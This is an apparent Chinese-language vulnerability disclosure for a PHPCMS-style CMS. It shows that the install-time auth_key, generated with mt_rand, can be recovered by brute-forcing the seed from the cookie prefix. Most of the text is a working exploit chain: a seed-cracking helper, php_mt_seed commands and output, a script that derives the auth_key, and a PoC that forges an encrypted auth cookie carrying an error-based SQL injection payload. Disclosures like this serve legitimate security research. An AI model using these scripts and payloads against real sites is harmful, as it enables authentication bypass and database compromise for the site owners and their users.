- 发布时间:2017-04-28
- 公开时间:N/A
- 漏洞类型:sql注入
- 危害等级:高
- 漏洞编号:xianzhi-2017-04-93356191
- 测试版本:N/A
漏洞详情
install/install.php 184行
if($module == 'admin') {
$cookiepre = random(5, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ').'';
$authkey = random(20, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
安装过程中初始化的2个随机值 一个是cookie前缀 一个是牛逼的auth_key
来看看random函数
function random($length, $chars = '0123456789') {
$hash = '';
$max = strlen($chars) - 1;
for($i = 0; $i < $length; $i++) {
$hash .= $chars[mt_rand(0, $max)];
}
return $hash;
}
可以看到使用mt_rand来生成随机数
mt_rand有个坑 研究过的人不少 就是随机数种子不是很强可以被爆破,而且php在一次访问中只会自动播种一次种子。看上面,在这一次访问中 共调用了5+20次mt_rand 而且前5次的值可知(cookie前缀),足够我们计算出随机数种子从而自己计算auth_key的值
利用过程
首先注册个账号 记录cookie值 比如我这里
oitzp__userid:4426Os84BFz69iT0YQjGWpPEtQp4niK3SXOJLwKA
oitzp就是cookie_pre
先用个小脚本生成参数
$s = 'oitzp';
$str = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ';
echo crack($s,$str);
function crack($s,$str){
for($i=0;$i<strlen($s);$i++){
echo strpos($str,$s[$i])." ".strpos($str,$s[$i])." 0 51 ";
}
}
得到
14 14 0 51 8 8 0 51 19 19 0 51 25 25 0 51 15 15 0 51
开始爆破
./php_mt_seed 14 14 0 51 8 8 0 51 19 19 0 51 25 25 0 51 15 15 0 51
大概几分钟后得到结果
Pattern: EXACT-FROM-52 EXACT-FROM-52 EXACT-FROM-52 EXACT-FROM-52 EXACT-FROM-52
Found 0, trying 33554432 - 67108863, speed 25228896 seeds per second
seed = 62227301
Found 1, trying 369098752 - 402653183, speed 26383041 seeds per second
seed = 392301305
seed = 393361608
Found 3, trying 738197504 - 771751935, speed 25992869 seeds per second
seed = 762840031
Found 4, trying 872415232 - 905969663, speed 25995686 seeds per second
seed = 903576050
Found 5, trying 1610612736 - 1644167167, speed 26116632 seeds per second
seed = 1625886859
Found 6, trying 1677721600 - 1711276031, speed 26120529 seeds per second
seed = 1708791794
Found 7, trying 1845493760 - 1879048191, speed 26121638 seeds per second
seed = 1850496645
Found 8, trying 2315255808 - 2348810239, speed 26072700 seeds per second
seed = 2327183983
Found 9, trying 2449473536 - 2483027967, speed 26049915 seeds per second
seed = 2453737360
Found 10, trying 2818572288 - 2852126719, speed 26083400 seeds per second
seed = 2821134341
Found 11, trying 3187671040 - 3221225471, speed 26049448 seeds per second
seed = 3195112468
Found 12, trying 3321888768 - 3355443199, speed 26056073 seeds per second
seed = 3355185931
Found 13, trying 3355443200 - 3388997631, speed 26029347 seeds per second
seed = 3370877999
Found 14, trying 3623878656 - 3657433087, speed 25983212 seeds per second
seed = 3635705652
Found 15, trying 3959422976 - 3992977407, speed 25973648 seeds per second
seed = 3976924131
Found 16, trying 4060086272 - 4093640703, speed 25997863 seeds per second
seed = 4070165693
Found 17, trying 4261412864 - 4294967295, speed 26030253 seeds per second
Found 17
总共有17个可能的随机数种子 收集一下丢给下一个脚本
$seeds = array(62227301,392301305,393361608,762840031,903576050,1625886859,1708791794,1850496645,2327183983,2453737360,2821134341,3195112468,3355185931,3370877999,3635705652,3976924131,4070165693);
for($i=0;$i<17;$i++){
mt_srand($seeds[$i]);
$cookie_pre = random(5, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ').'';
$auth_key = random(20, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
if (authcode("4426Os84BFz69iT0YQjGWpPEtQp4niK3SXOJLwKA","DECODE",$auth_key) == "1"){
//上面的1是注册的uid
//可以从index.php?m=member&c=index&a=account_manage_info&t=1拿到
echo $seeds[$i]."\n".$auth_key;
}
}
得到结果:
3370877999
fkedKUovc9hFpKvX0hcH
就这么分分钟拿到可auth_key
简单演示下注入
phpcms/modules/member/class/foreground.class.php 19行
final public function check_member() {
$phpcms_auth = param::get_cookie('auth');
if(ROUTE_M =='member' && ROUTE_C =='index' && in_array(ROUTE_A, array('login', 'register', 'mini','send_newmail'))) {
if ($phpcms_auth && ROUTE_A != 'mini') {
showmessage(L('login_success', '', 'member'), 'index.php?m=member&c=index');
} else {
return true;
}
} else {
//判断是否存在auth cookie
if ($phpcms_auth) {
$auth_key = $auth_key = get_auth_key('login');
list($userid, $password) = explode("\t", sys_auth($phpcms_auth, 'DECODE', $auth_key));
//验证用户,获取用户信息
$this->memberinfo = $this->db->get_one(array('userid'=>$userid));
$userid来自cookie且经过2次sys_auth加密 无视防御
poc:
$str = "1' and (extractvalue(1,concat(0x7e,(select user()),0x7e)));#\tasdf";
$en1 = authcode($str,"ENCODE",get_auth_key("login"));
$en2 = authcode($en1,"ENCODE",'fkedKUovc9hFpKvX0hcH');//刚才拿到的auth_key
echo urlencode($en2);
function get_auth_key($prefix,$suffix="") {
if($prefix=='login'){
$pc_auth_key = md5('fkedKUovc9hFpKvX0hcH'.'192.168.199.171');//本机IP
}else if($prefix=='email'){
$pc_auth_key = md5('fkedKUovc9hFpKvX0hcH');
}else{
$pc_auth_key = md5('fkedKUovc9hFpKvX0hcH'.$suffix);
}
$authkey = md5($prefix.$pc_auth_key);
return $authkey;
}
修改cookie oitzp_auth值为生成的payload
访问/index.php?m=member即可看到报错信息
